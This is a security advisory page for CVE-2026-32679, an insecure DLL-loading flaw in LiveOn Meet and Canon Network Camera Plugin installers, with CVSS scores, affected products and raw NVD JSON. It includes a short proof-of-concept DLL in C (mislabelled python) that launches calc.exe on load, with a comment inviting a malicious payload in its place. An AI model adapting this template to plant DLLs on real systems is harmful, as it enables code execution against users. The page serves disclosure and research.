Security Vulnerability Report
中文
CVE-2026-32679 CVSS 7.8 HIGH

CVE-2026-32679

Published: 2026-04-23 00:16:45
Last Modified: 2026-05-18 17:04:05
Source: [email protected]

Description

The installers of LiveOn Meet Client for Windows (Downloader5Installer.exe and Downloader5InstallerForAdmin.exe) and the installers of Canon Network Camera Plugin (CanonNWCamPlugin.exe and CanonNWCamPluginForAdmin.exe) insecurely load Dynamic Link Libraries (DLLs). If a malicious DLL is placed at the same directory, the affected installer may load that DLL and execute its code with the privilege of the user invoking the installer.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:liveon:canonnwcamplugin.exe:1.0.0.0:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:liveon:canonnwcampluginforadmin.exe:1.0.0.0:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:liveon:downloader5installer.exe:1.0.0.0:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:liveon:downloader5installerforadmin.exe:1.0.0.0:*:*:*:*:windows:*:* - VULNERABLE
LiveOn Meet Client for Windows (Downloader5Installer.exe)
LiveOn Meet Client for Windows (Downloader5InstallerForAdmin.exe)
Canon Network Camera Plugin (CanonNWCamPlugin.exe)
Canon Network Camera Plugin (CanonNWCamPluginForAdmin.exe)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <windows.h> #include <stdlib.h> // Payload to execute: e.g., calc.exe // Replace this with your malicious payload void execute_payload() { WinExec("calc.exe", SW_SHOW); } // DLL Entry Point BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // Code runs when the DLL is loaded into the process execute_payload(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32679", "sourceIdentifier": "[email protected]", "published": "2026-04-23T00:16:45.157", "lastModified": "2026-05-18T17:04:05.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The installers of LiveOn Meet Client for Windows (Downloader5Installer.exe and Downloader5InstallerForAdmin.exe) and the installers of Canon Network Camera Plugin (CanonNWCamPlugin.exe and CanonNWCamPluginForAdmin.exe) insecurely load Dynamic Link Libraries (DLLs). If a malicious DLL is placed at the same directory, the affected installer may load that DLL and execute its code with the privilege of the user invoking the installer."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liveon:canonnwcamplugin.exe:1.0.0.0:*:*:*:*:windows:*:*", "matchCriteriaId": "3FA8C724-4A73-49CA-AE88-EDFABB7E34D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liveon:canonnwcampluginforadmin.exe:1.0.0.0:*:*:*:*:windows:*:*", "matchCriteriaId": "E415E482-79DB-49F5-B6DE-3200E2E80453"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liveon:downloader5installer.exe:1.0.0.0:*:*:*:*:windows:*:*", "matchCriteriaId": "96FEE618-B589-4081-9102-7FC0FAD008BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liveon:downloader5installerforadmin.exe:1.0.0.0:*:*:*:*:windows:*:*", "matchCriteriaId": "C2EA05EC-598C-4B21-9350-AAB236D98BE6"}]}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN45563482/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://web.liveon.ne.jp/wp-content/uploads/2026/04/JMSSA2026-001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.